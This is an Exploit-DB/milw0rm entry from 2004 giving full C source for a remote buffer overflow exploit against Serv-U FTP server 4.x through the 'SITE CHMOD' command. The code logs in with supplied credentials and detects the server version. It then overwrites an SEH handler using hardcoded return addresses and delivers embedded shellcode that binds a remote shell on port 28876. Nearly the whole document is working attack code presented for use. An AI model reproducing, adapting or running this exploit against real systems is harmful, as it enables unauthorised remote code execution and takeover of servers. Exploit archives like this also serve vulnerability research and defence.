RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow

EDB-ID:

822


Author:

Skylined

Type:

remote


Platform:

Windows

Date:

2004-01-30


#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define exploit_length      511
#define NOP 'A'

#define SEH_handler_offset  400
char* SEH_handler     = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b

char* shellcode = 
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
  "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
  "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
  "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
  "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
  "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
  "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
  "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
  "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

int sock;
FILE* FILEsock;
int doubling;

void send_command(char *command, char *arguments) {
  int i;
  send(sock, command, strlen(command), 0);
  send(sock, " ", 1, 0);
  for (i=0; i<strlen(arguments); i++) {
    send(sock, arguments+i, 1, 0);
    if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
  }
  send(sock, "\x0a\x0d", 2, 0);
}

int main(int argc, char *argv[], char *envp[]) {
  struct sockaddr_in addr;
  char *outbuffer, inbuffer[256];
  char *retaddress = NULL;
  char *version = NULL;

  if (argc<5) {
    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
    exit(-1);
  }

  printf("- Serv-ME ----------------------------------------------------\n"
         "  Serv-U v4.x \"site chmod\" exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
         "  Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "\n"
         "  Binds a shell at %s:28876 if successfull.\n"
         "  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
         "--------------------------------------------------------------\n",
           argv[1]);

  addr.sin_family = AF_INET;
  addr.sin_port = htons(atoi(argv[2]));
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("Socket creation failed");
    exit(-1);
  }
  if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
    perror("Connection failed");
    exit(-1);
  }
  FILEsock = fdopen(sock, "r");
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
    printf("[-] This is not a Serv-U v4.X ftp server.\n");
    exit(-1);
  }
  if (strstr(inbuffer, "v4.1") > 0) {
    retaddress = retaddress_4103;
    version = "4.1.0.3";
  }

  printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
  send_command("USER", argv[3]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  send_command("PASS", argv[4]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "230") != inbuffer) {
    printf("[-] Login failed.\n");
    exit(-1);
  }

  if (argv[5]) {
    printf("\n[+] Changing directory...\n");
    send_command("CD", argv[5]);
    printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  }

  outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
  memset(outbuffer, NOP, exploit_length);
  memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));

  printf("\n[+] Checking if \\xff doubling is nescesary: ");
  send_command("SITE CHMOD 477", "-\xff\xff-");
  fgets(inbuffer, sizeof inbuffer, FILEsock);
  if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
    doubling = 1;
    printf("Yes.");
    retaddress = retaddress_4004;
    version = "4.0.0.4";
  } else {
    printf("No.");
    if (retaddress==NULL) {
      retaddress = retaddress_4100;
      version = "4.1.0.0";
    }
  }
  printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
                      version, *(int*)retaddress);
  memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
  memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));

  printf("\n[+] Sending exploit... ");
  send_command("SITE CHMOD 477", outbuffer);
  printf("send, you can now try to connect to %s:28876.\n", argv[1]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  close(socket);
  printf("\n[+] Done. \n");
}


// milw0rm.com [2004-01-30]